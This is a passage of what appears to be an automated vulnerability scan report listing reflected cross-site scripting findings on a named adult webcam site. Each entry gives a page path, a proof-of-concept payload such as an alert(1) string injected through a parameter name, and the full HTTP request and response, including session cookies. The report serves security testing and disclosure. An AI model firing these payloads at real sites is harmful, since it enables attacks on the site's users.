Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:56 GMT
Connection: close
Content-Length: 21593
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/becomehost.aspx?ae13c"><a>8ef4c400f3a=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

4.486. http://imlive.com/becomehost.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/becomehost.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cbb67'-alert(1)-'15501fee645 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /becomehost.aspx?cbb67'-alert(1)-'15501fee645=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 21781
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/becomehost.aspx&he=imlive.com&ul=/becomehost.aspx?cbb67'-alert(1)-'15501fee645=1&qs=cbb67'-alert(1)-'15501fee645=1&qs=cbb67'-alert(1)-'15501fee645=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function
...[SNIP]...

4.487. http://imlive.com/categoryfs.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/categoryfs.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1290d'><a>0243a0c9435 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /categoryfs.asp?cat=232&1290d'><a>0243a0c9435=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:30 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmuTmCT55rdh7t3zZ04MFTzw; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:30 GMT
Connection: close
Content-Length: 18966
Vary: Accept-Encoding

<html>
   <head>
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
       <title>Find Friends & Romance on Live Webcam Video Chat at ImLive</title>
       <meta name="d
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryfs.asp?cat=232^1290d'><a>0243a0c9435=1&lr=1107816009&ud=0&pe=categoryfs.asp&qs=cat=232^1290d'>
...[SNIP]...

4.488. http://imlive.com/categoryms.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/categoryms.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61172'><a>3b9652ee722 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /categoryms.asp?cat=2&61172'><a>3b9652ee722=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:32 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmsTHmj4p7KUq0DeR%2BO3xTkb; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:32 GMT
Connection: close
Content-Length: 21858
Vary: Accept-Encoding

<html>
   <head>
       <title>Mysticism & Spirituality Live Video Chat at ImLive</title>
       <META NAME="Description" CONTENT="Live video chat with Mysticism & Spirituality experts. Astrologers, Psychics
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/categoryms.asp?cat=2^61172'><a>3b9652ee722=1&lr=1107816009&ud=0&pe=categoryms.asp&qs=cat=2^61172'>
...[SNIP]...

4.489. http://imlive.com/celebrity-porn-stars/celebrity-events/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/celebrity-porn-stars/celebrity-events/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db582'-alert(1)-'4b3c1d175fb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /celebrity-porn-stars/celebrity-events/?db582'-alert(1)-'4b3c1d175fb=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:59 GMT
Connection: close
Content-Length: 2667
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
War
...[SNIP]...
<script type="text/javascript">
function IAgree(){document.location.href='?meAgree=yes&redirect=%2fcelebrity-porn-stars%2fcelebrity-events%2f%3fdb582'-alert(1)-'4b3c1d175fb%3d1'; return false;}
function IDontAgree() { window.parent.location.href = "/"; return false; }
</script>
...[SNIP]...

4.490. http://imlive.com/disclaimer.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/disclaimer.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cd26f'><a>d83acef05af was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /disclaimer.asp?cd26f'><a>d83acef05af=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:13:16 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:13:16 GMT
Connection: close
Content-Length: 78891
Vary: Accept-Encoding

<html>
   <head>
       <title>Disclaimer - Live Video Chat at ImLive</title>

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" typ
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/disclaimer.asp?cd26f'><a>d83acef05af=1&lr=1107816009&ud=0&pe=disclaimer.asp&qs=cd26f'>
...[SNIP]...

4.491. http://imlive.com/forgot.aspx [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/forgot.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e80f3'-alert(1)-'c0da0968686 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /forgot.aspx?e80f3'-alert(1)-'c0da0968686=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:43 GMT
Connection: close
Content-Length: 3338
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Imlive.com Customer Serv
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/forgot.aspx&he=imlive.com&ul=/forgot.aspx?e80f3'-alert(1)-'c0da0968686=1&qs=e80f3'-alert(1)-'c0da0968686=1&qs=e80f3'-alert(1)-'c0da0968686=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

4.492. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/homepagems3.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e62a5"><a>8b3d580d15c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homepagems3.asp?e62a5"><a>8b3d580d15c=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:04:32 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=OCAEMBCBLGFDAAHFKEJLGHNK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:04:32 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10275

<html>
<head>

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<form onsubmit="return CheckForm(this);" method="post" action="homepagems3.asp?e62a5"><a>8b3d580d15c=1" style="margin:0;" name="frmLogin" ID="frmLogin">
...[SNIP]...

4.493. http://imlive.com/homepagems3.asp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://imlive.com
Path:	/homepagems3.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ef1f'><a>f607da23703 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /homepagems3.asp?6ef1f'><a>f607da23703=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2frSJLJIAqaJZ0edqc48maagLObAFtqg%2b4Ftnp8FL%2bWXDSNB1qb%2fDfrHETDCj1A%3d; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:04:48 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: ix=k; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; path=/
Set-Cookie: ASPSESSIONIDCARBBRTR=DEAEMBCBEHGBLGDACDEEAKAD; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:04:49 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 10275

<html>
<head>

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/headerguest.css" />

<link rel="stylesheet" type="text/css" href="http://i1.imlive.com/css/hostbasic.c
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/homepagems3.asp?6ef1f'><a>f607da23703=1&lr=1107816009&ud=0&pe=homepagems3.asp&qs=6ef1f'>
...[SNIP]...

4.494. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imlive.com
Path:	/live-sex-chats/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d227'-alert(1)-'63744927c3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /live-sex-chats/?6d227'-alert(1)-'63744927c3a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
